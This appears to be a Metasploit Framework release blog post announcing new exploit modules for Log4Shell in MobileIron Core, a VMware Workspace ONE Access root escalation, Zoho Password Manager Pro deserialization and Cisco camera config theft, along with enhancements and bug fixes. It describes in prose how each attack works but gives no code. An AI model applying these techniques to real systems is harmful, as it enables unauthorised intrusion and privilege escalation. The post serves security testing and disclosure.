Last updated at Sat, 20 Jan 2024 22:20:44 GMT

Log4Shell in MobileIron Core

Thanks to jbaines-r7 we have yet another Log4Shell exploit. Similar to the other Log4Shell exploit modules, the exploit works by sending a JNDI string that once received by the server will be deserialized, resulting in unauthenticated remote code execution as the tomcat user. Vulnerable versions of MobileIron Core have been reported as exploited in the wild.

VMware Workspace ONE Access LPE

Our very own Spencer McIntyre discovered and added a local privilege escalation module for CVE-2022-31660 in VMware Workspace ONE Access. By default, the horizon user has write permissions to the /opt/vmware/certproxy/bin/cert-proxy.sh script, and the sudo configuration does not require supplying a password when invoking the script. Due to this, an attacker can write arbitrary code to the /opt/vmware/certproxy/bin/cert-proxy.sh script and escalate their privileges to that of the root user by executing the certproxyService.sh with sudo. Because the horizon user runs the externally-facing web application in VMware Workspace ONE Access, CVE-2022-22954 can be leveraged for initial access to the target.

XML-RPC Unauthenticated RCE in Zoho Password Manager

Grant Willcox of the Metasploit team added a module that exploits a deserialization flaw in Zoho Password Manager Pro. Sending a single POST request containing XML-RPC data to the /xmlrpc endpoint will result in unauthenticated code execution as NT AUTHORITY\SYSTEM.

New module content (5)

  • Cisco PVC2300 POE Video Camera configuration download by Craig Heffner and Erik Wynter - This adds a module targeting Cisco PVC2300 IP Cameras that will download the configuration file using hard-coded credentials.
  • BACnet Scanner by Paz - This adds a new scanner module that discovers BACnet devices on the network and extracts model name, software version, firmware revision, and device description. Once the data is processed, it is displayed on screen and saved to a local xml file.
  • MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and rwincey, which exploits CVE-2021-44228 - This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is an unauthenticated remote code execution in the context of the web application user.
  • VMware Workspace ONE Access CVE-2022-31660 by Spencer McIntyre, which exploits CVE-2022-31660 - This module exploits CVE-2022-31660, an LPE disclosed by VMware in VMSA-2022-0021. The underlying flaw is that the /opt/vmware/certproxy/bin/cert-proxy.sh script is writable by the horizon user who can also indirectly execute it by invoking the certproxyService.sh script via sudo which is permitted without a password, enabling escalation to root.
  • Zoho Password Manager Pro XML-RPC Java Deserialization by Grant Willcox, Vinicius, and Y4er, which exploits CVE-2022-35405 - This PR adds in an exploit module for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE as SYSTEM.

Enhancements and features (3)

  • #16833 from gwillcox-r7 - This PR adds an option to the host command to make it easier to delete host tags.
  • #16840 from bcoles - This replaces some Meterpreter-only method calls with method calls that check the session type, which allows non-Meterpreter sessions to use read_profile_list
    and load_missing_hives. Also, this changes read_profile_list to be able to read profile information for all accounts.
  • #16858 from adfoster-r7 - This updates ZeroLogon to have better error handling in the check method. This will cause the error from an invalid NetBIOS name to be reported with a meaningful message.

Bugs fixed (8)

  • #16820 from gwillcox-r7 - This PR fixes an issue in the ldap_query module where if the datastore option "action" wasn't set the module would fail.
  • #16822 from adfoster-r7 - This fixes a bug in Rex::Ui::Text::Input::Buffer::BufferSock that was causing data to be occasionally lost due to the rsock monitor routine stopping abruptly.
  • #16825 from rbowes-r7 - The IMAP credential capture module did not appropriately handle literal strings as specified by RFC3501. The code has been updated to handle these strings efficiently.
  • #16832 from gwillcox-r7 - This fix removes an unnecessary echo statement from the ms10_092_schelevator module.
  • #16839 from bcoles - Fixes shell_registry_enumvals/getvaldata error checking.
  • #16844 from bcoles - This PR updates the post/multi/gather module to support non-meterpreter sessions like shell and powershell.
  • #16846 from jmartin-r7 - Updates auxiliary/scanner/ssh/ssh_login to gracefully handle Errno::EPIPE exceptions.
  • #16848 from jmartin-r7 - Fix a crash when updating session information in Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).